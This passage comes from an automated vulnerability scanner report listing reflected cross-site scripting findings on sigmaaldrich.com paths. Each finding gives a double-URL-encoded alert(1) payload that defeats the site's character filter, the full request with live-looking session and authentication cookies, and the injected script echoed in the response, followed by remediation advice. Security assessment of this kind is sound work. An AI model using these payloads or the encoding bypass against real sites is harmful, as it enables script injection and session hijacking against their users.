Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:46 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentfeb37";alert(1)//a7dba31e652/sigma-aldrich/areas-of-interest/programs","E404") ;
   </script>
...[SNIP]...

1.138. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3650%2522%253balert%25281%2529%252f%252f8eecd9f8cc was submitted in the REST URL parameter 2. This input was echoed as e3650";alert(1)//8eecd9f8cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldriche3650%2522%253balert%25281%2529%252f%252f8eecd9f8cc/areas-of-interest/programs HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:47 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldriche3650";alert(1)//8eecd9f8cc/areas-of-interest/programs","E404") ;
   </script>
...[SNIP]...

1.139. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea8c%2522%253balert%25281%2529%252f%252feba22e09a28 was submitted in the REST URL parameter 3. This input was echoed as bea8c";alert(1)//eba22e09a28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interestbea8c%2522%253balert%25281%2529%252f%252feba22e09a28/programs HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:49 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestbea8c";alert(1)//eba22e09a28/programs","E404") ;
   </script>
...[SNIP]...

1.140. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77902%2522%253balert%25281%2529%252f%252fb5ed9d6d895 was submitted in the REST URL parameter 4. This input was echoed as 77902";alert(1)//b5ed9d6d895 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/programs77902%2522%253balert%25281%2529%252f%252fb5ed9d6d895 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:51 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/programs77902";alert(1)//b5ed9d6d895","E404") ;
   </script>
...[SNIP]...

1.141. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb960%2522%253balert%25281%2529%252f%252f5dd6c2ad38f was submitted in the REST URL parameter 1. This input was echoed as eb960";alert(1)//5dd6c2ad38f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenteb960%2522%253balert%25281%2529%252f%252f5dd6c2ad38f/sigma-aldrich/customer-support/customer-service/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenteb960";alert(1)//5dd6c2ad38f/sigma-aldrich/customer-support/customer-service/about-us","E404") ;
   </script>
...[SNIP]...

1.142. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc060%2522%253balert%25281%2529%252f%252f7e103f95f12 was submitted in the REST URL parameter 2. This input was echoed as fc060";alert(1)//7e103f95f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichfc060%2522%253balert%25281%2529%252f%252f7e103f95f12/customer-support/customer-service/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
